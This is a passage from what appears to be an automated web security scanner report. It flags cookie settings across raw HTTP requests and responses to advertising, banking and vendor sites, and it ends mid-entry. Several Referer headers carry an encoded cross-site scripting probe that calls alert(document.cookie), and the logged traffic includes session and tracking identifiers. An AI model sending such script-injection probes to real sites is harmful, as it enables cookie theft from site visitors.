http://0.r.msn.com/?ld=4vRbS86owapl3S39Z4NwMAKr4jyz22X6f5dq3sOZl3K-Tm58oqyL8R5a33jSckizaBNT5cqDC9dLnoaZwTRDOLvCZuP4Hd1tKvEGJ48Yg9ymMJUuchZooEvHE_4jToP11VzLwGkpUJmfw1tzGs_9KHJ_QsGQopcDEBlHJ02toOlMw3OhpT1Sp7-kfL9vx_wVr4rwVXhSB2g9cP7EGt9qNcAk5HUrKtBKDzRN8QhEo47mKLtSbpmbu2KcKS3GNjRKqjDvFQZcDTd5nER86kSK4uM2XjSrFBnsGCZ7NGKSh7ZoQtgERZ8WACUwwwqd-diM7ZNVQJTMGV28mF1YgtRXKVbb_ViygQJmNzPUXkUWKbQX8wNyfrVBB6rZ5hfUNg8ZC5_is4of3on-HJ Content-Length: 605 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://0.r.msn.com/?ld=4vRbS86owapl3S39Z4NwMAKr ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/library/ms537509(VS.85 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 13151 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: A=I&I=AxUFAAAAAAAyBwAAuz30ai1AfCKXhVuk1jrJ1A!!&M=1; domain=.microsoft.com; expires=Tue, 05-Feb-2041 22:58:24 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 22:58:26 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /myresults/bookmarklet HTTP/1.1 Host: myweb2.search.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Sun, 06 Feb 2011 16:01:23 GMT Set-Cookie: B=86nvjvd6kthej&b=3&s=sl; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Location: http://bookmarks.yahoo.com/myresults/bookmarklet Cache-Control: private Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 190
The document has moved <A HREF="http://bookmarks.yahoo.com/myresults/bookmarklet">here</A>.<P> <!-- fe06.bookmarks.search.re3.yahoo.com uncompressed/chunked Sun Feb 6 08:01:23 PST 2011 -->
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /myca/acctsumm/us/action HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /myca/logon/us/action HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: orthoinfo.aaos.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 21:51:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-cookie: SaneID=173.193.214.243-16894361880414; path=/; expires=Sat, 05-Feb-16 21:51:39 GMT; domain=.aaos.org Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ps/?pid=114&cgn=13694&seg=5360 HTTP/1.1 Host: pixel.33across.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=189445;type=amexo204;cat=2009a134;ord=1;num=3654638226144.0156? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 33x_ps=u%3D6285160526%3As1%3D1295482376917%3Ats%3D1296758537488%3As2.33%3D%2C6770%2C6570%2C4150%2C
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 05 Feb 2011 21:49:43 GMT Server: 33X1 P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA' Location: http://segment-pixel.invitemedia.com/pixel?partnerID=38&key=segment&code=5360&random=590147 Content-Length: 0 Set-Cookie: 33x_ps=u%3D6285160526%3As1%3D1295482376917%3Ats%3D1296942584073%3As2.33%3D%2C6770%2C6570%2C4150%2C5360%2C; Domain=.33across.com; Expires=Sun, 05-Feb-2012 21:49:44 GMT; Path=/ Connection: close Content-Type: text/plain; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel.jsp?id=2773,2770,2765,2794,2792,2795,2763,2764&type=script&ipid=18400&sfid=0 HTTP/1.1 Host: pixel.intellitxt.com Proxy-Connection: keep-alive Referer: http://download32.us.intellitxt.com/iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2770%2C2765%2C2794%2C2792%2C2795%2C2763%2C2764%26type%3Dscript%26ipid%3D18400%26sfid%3D0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_PIX=AQAAAAkAAArrAQAAAAEAAAEt98vDoAAACuoBAAAAAQAAAS33y8OgAAAKywEAAAABAAABLffLw6AAAAroAQAAAAEAAAEt98vDoAAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAHcLRHA--; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 21:48:02 GMT; Path=/ Content-Type: text/html Vary: Accept-Encoding Date: Sat, 05 Feb 2011 21:48:02 GMT Connection: close Content-Length: 3149
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel;r=535453051;fpan=1;fpa=P0-1697810850-1296942494788;ns=0;url=http%3A%2F%2Fwww.download32.com%2Fnslookup-software.html;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1296942494785;tzo=360;a=p-fdwEfW0hIeH9U;tags=721.8541.18400 HTTP/1.1 Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EKUAJKANq0itiBCpnizJGquYH6TbIAG6AQH9BYHWAJrR5q8fLyD5HhvB0s5SBu0fLC5Rs7ohqS4t8QyUYA-yASARKR8w4wANMOMAjFCSDU0esuGcFUAPJuELHrPBCxpRseEAKhHyAiABcuTD6CUDsjg7EeGaIQ
Response
HTTP/1.1 302 Found Connection: close Location: http://ad.yieldmanager.com/unpixel?id=1055858&id=1057014&t=2 Set-Cookie: d=EIcAJKANq0itiBCpnizJGquYH6TbIAGzAQH9BYHWAJrR5q8fLyD5HhvB0s5SBu0fLC5Rs7ohqS4t8QyUYA-yASARKR8w4wANMOMAjFCSDU0YhIFADybhCx6zwQsaUbHhAE0QIgAXLkw-glA7I4OxHhmiEA; expires=Fri, 06-May-2011 21:47:57 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 0 Date: Sat, 05 Feb 2011 21:47:57 GMT Server: QS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cm?id=CAESEJ1QzO8syyE54_azrc6wYSw&cver=1 HTTP/1.1 Host: px.owneriq.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; si=7431457a-2008-4af6-823b-5fab70668c12; oxuuid=a9147669-7acb-495a-a7a7-b8a2e6b13599; ss=2n78c.6f2tf.6qa; rpq=351513.866594.150149.351513.866594
Response
HTTP/1.1 302 Moved Temporarily Server: Apache/2.2.15 (Fedora) X-Powered-By: PHP/5.2.13 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Location: http://ib.adnxs.com/px?bidder=13&seg=49740&qsdata=7431457a-2008-4af6-823b-5fab70668c12:4441692.10781187.8722&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fadv%3D95413%26t%3D2%26id%3D351513%26id%3D866594%26id%3D150149%26id%3D351513%26id%3D866594 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Sat, 05 Feb 2011 22:28:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 22:28:27 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gguuid=CAESEJ1QzO8syyE54_azrc6wYSw; expires=Thu, 04-Feb-2016 22:28:27 GMT; path=/; domain=.owneriq.net Set-Cookie: rpq=deleted; expires=Fri, 05-Feb-2010 22:28:26 GMT; path=/; domain=.owneriq.net
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /oxcm?s=4441692.10781187&oxuuid=a9147669-7acb-495a-a7a7-b8a2e6b13599 HTTP/1.1 Host: px.owneriq.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; ss=2n78c.6f2tf; si=7431457a-2008-4af6-823b-5fab70668c12; rpq=351513.866594
Response
HTTP/1.1 200 OK Server: Apache/2.2.15 (Fedora) X-Powered-By: PHP/5.2.13 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Content-Length: 43 Content-Type: image/gif Expires: Sat, 05 Feb 2011 22:27:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 22:27:24 GMT Connection: close Set-Cookie: oxuuid=a9147669-7acb-495a-a7a7-b8a2e6b13599; expires=Thu, 04-Feb-2016 22:27:24 GMT; path=/; domain=.owneriq.net
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /p?sid%5B%5D=4441692&sid%5B%5D=10781187&rid%5B%5D=351513&rid%5B%5D=866594&pt=oiq HTTP/1.1 Host: px.owneriq.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: memSessionId=59308638-3172-11e0-bdbb-0030485f67c6
Response
HTTP/1.1 302 Moved Temporarily Server: Apache/2.2.15 (Fedora) X-Powered-By: PHP/5.2.13 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Location: http://cm.g.doubleclick.net/pixel?nid=owneriq1 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Sat, 05 Feb 2011 22:27:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 22:27:10 GMT Connection: close Vary: Accept-Encoding Set-Cookie: ss=2n78c.6f2tf; expires=Thu, 04-Feb-2016 22:27:10 GMT; path=/; domain=.owneriq.net Set-Cookie: si=18fa5f7f-8d3f-4a46-9deb-a7032f753452; expires=Thu, 04-Feb-2016 22:27:10 GMT; path=/; domain=.owneriq.net Set-Cookie: rpq=351513.866594; expires=Thu, 04-Feb-2016 22:27:10 GMT; path=/; domain=.owneriq.net
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /myca/loyalty/us/rewards/mracctmgmt/acctsumm?request_type=authreg_mr&Face=en_US&inav=menu_myacct_mrpointsum HTTP/1.1 Host: rewards.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /action/doq.htm?pcode=utf-8&r=1296944169071.1 HTTP/1.1 Host: rt32.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf content-type: application/x-www-form-urlencoded;charset=utf-8 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=2 Content-Length: 707
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /action/doq.htm?pcode=utf-8&r=1296944132135.1 HTTP/1.1 Host: rt82.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf content-type: application/x-www-form-urlencoded;charset=utf-8 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=1 Content-Length: 663
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /action/doq.htm?pcode=utf-8&r=1296944122040.1 HTTP/1.1 Host: rt83.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf content-type: application/x-www-form-urlencoded;charset=utf-8 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=0 Content-Length: 615
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b HTTP/1.1 Host: sb.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: https://sb.voicefive.com/b2? Date: Sun, 06 Feb 2011 16:04:44 GMT Connection: close Set-Cookie: UID=4794bf8-184.50.222.110-1297008284; expires=Tue, 05-Feb-2013 16:04:44 GMT; path=/; domain=.voicefive.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.0 200 OK Server: IM BidManager Date: Sat, 05 Feb 2011 21:48:02 GMT P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Expires: Sat, 05-Feb-2011 21:47:42 GMT Content-Type: text/javascript Pragma: no-cache Cache-Control: no-cache Set-Cookie: segments="13746|10659|16748|3425|38582,1298044270|40657|24085|10102|3391|3392|23864|11262|11265|9800|30353|7775|17277|38781|8|27273|2377"; Domain=invitemedia.com; expires=Sun, 05-Feb-2012 21:48:02 GMT; Path=/ Content-Length: 343
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: splunkbase.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/2956?ret=html HTTP/1.1 Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://c03.adsummos.net/a/e/s21719 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJpMTsPQAJe62ZPAWmPMRnC3fxhA3xnadgI6Oq/ZLEWyw9s0tOiXKuWLHQR8wCMgekeLm818AYDJaWFPNyv09JtgWxy=; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeiItK1DQ2DeZe/OOnucgf4gN2FqcRgzDKHQ1P9ND/VE9yPYr8a3TyHPRwzGIqSi7En/8LKIFfdglEXTgLyXe3guyjs9fIYmxXMSnIwNe2gf3LwuVE1IhC5e8xwE1eaNe2AF7KmjGV/BKOlmdRy9YZD8Gjsn8MXzzrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9/usgtT=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gSaryeamXaiZLyksKZhmLS9AwOyLeDhBxTliEahBez01M/6+yGv5aWehCyo3RVkCqtSXL54xsewPRJ; bk=nNkisZVZbt/sHNJo; bkc=KJh56NN/aaWDOdOpjljU+2NayT4VRQFYUV6CvCVLoB0kOlBkIG9yeKZeDQhSBrFOG7xaWRA1GG/Qb9r0aXWYcT3tCeR4KQLY/5CKQGQPx7GhQIMM7JZ8zplljRR4d1IjZUwweOQ9i6Z9Chz+uye99n3Lr5K74WTTFr2boOn9l0OQ6TV6jzJu/dk8eoC7Bam229LdyaywywuPeLr9Z2UA90ar0A+wglcXrtSnaRYl2Xi+T20pLXGq/ye5zxWFX07nO6mB8mXJRvjI6AIe9wUe9cUkeeGR/BIIpcNn12Pn7ln7Xd4P5LLwCDc0QIFvVqx8iokToptdgJrUnZYdKKy4gKlWfylR43KjX+/k7mKcxReQuLSrJfdwzPBKIQfmBk9oGnZLFcDc1aBKrrMmKIiEX+Tx5fiGcWu7Hf7wMccwlPPIM4jC4KkuCIKJp5p64sZ3od+W+BNtcNbZNrv1td5843vjb3VnKcZtcZeXSCFrl8X3XGhZ0AF4yw6TlYyQQ4LSC7P9fG2pDN8bLLnh1rb49Dr70VlcrPmSRXwvDpMqlUQIdhqltm2nl3ZjIAFMmYYcdggvjpUlSLqhKmfcdtFCv1ecpfLXH0wzPYX5YK1rPyrRpf5TUQkyDNfbYm841G+fw3nzGJ706klrIh867UK4428Dw3c8Pf50MI7AY6Rn7o2CK0psdSiJIfcZRy7CIRKf4NX1opd8D/MqUmSKgOYK32ppv3N0oG7ft6drZQlY1fMfNqz+bEk2MUrCEMYduUeUN7mlogMlSTb5PwTw5S1Skx==; bkdc=res
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 22:25:31 GMT P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml" Pragma: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: max-age=0, no-cache, no-store Set-Cookie: bk=Nk1GUZVZbt/sHNJo; expires=Thu, 04-Aug-2011 22:25:31 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=KJh5Na+/asWDOdedfvbgt0GSw3EaaGuftAJDvkCJrDLwoMJ5/WonrkOvxVnVQ6UoYi/uqH9POWWl0aTWYlyGtCnS4mio/O9YKyAiPQiJyQ0i0pZpXXl7IP8ZIzcd7JA2l8kJCTW4CHRmFqP+Y6YSdBNyjyYKEd39rECyf8htpMe7kD2qK52hwPQWaBHRVc1tS4LhUX+I6QFCYzBzgd069JM391RF++QIUY+MfyonzN884a7KFXFUtDsXrLNrcJsK7BHKUxv6H06Xu0UL9wogtP2MWmjI0G2YxwD9DJPgJRKYfOLUovXq87gkRI8XdMf4SOzQ6XKIK6VfCIy4GA06pjk4M8+UpkYdSKo4D5ksdp4GInPCpiFw6Mp42xsChPS77FtZP8gp0M5o+LWiYdD8f4Vq/1h88SyffdTwt+Fe6LPjfH98muH2RkCbboqtYlv9bZ4w+lQKUuFB2N4ZKFT5gVCtlWVULKD6TIR57CXS87gkna6KgyHsnMUHdF6ojDXR8gp0P53wF4DVRguFhPQO575DZFwvbzvXatMd4JQdpZTbnJ6ycO7xc3wjq3UpIEKlpUkK2ZqelaIjhGaKXrzkwZVT6pYBhl1lFPXpOTelcf5TgiiH87gkAZnS8E/n6bAspT+OSzTgfbw2id4x7Q23NhMZFwJI2lklr6b82pdMNp8iIaKf5Gzd7XdTsrMX4/bc/2nlbbx4seTRLphdzd4FA0d47f67nmN4AWfE2NS8NetFtuPrgjwIXkmb4JUksK8I5Vt/K68KkoboLGH4h3xg3bDqW2/feDKmSFXcOjxMIy==; expires=Thu, 04-Aug-2011 22:25:31 GMT; path=/; domain=.bluekai.com Set-Cookie: bkdc=res; expires=Sun, 06-Feb-2011 22:25:31 GMT; path=/; domain=.bluekai.com BK-Server: 9936 Content-Length: 77 Content-Type: text/html Connection: keep-alive
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/display HTTP/1.1 Host: tools.cisco.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /js/jsserv.php?mblID=2010103023295009 HTTP/1.1 Host: track2.mybloglog.com Proxy-Connection: keep-alive Referer: http://www.orthougm.com/nslookup.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:47:59 GMT Set-Cookie: BX=7rv9lsd6krhcf&b=3&s=je; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.mybloglog.com P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" policyref="http://www.mybloglog.com/w3c/p3p.xml" Expires: Sun, 06 Feb 2011 00:00:00 GMT Set-Cookie: mbl_sid=N2011020513475974; expires=Sun, 05-Feb-2012 21:47:59 GMT; path=/; domain=.mybloglog.com Cache-Control: private Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17463
<!-- var mbl_recent_visitor=''; var mbl_current_visitor=''; if(typeof(mbl_jsserv_loaded)=='undefined'){var mbl_jsserv_loaded=true;function m_r_e(obj,w,f){if(window.addEventListener){obj.addEventListe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
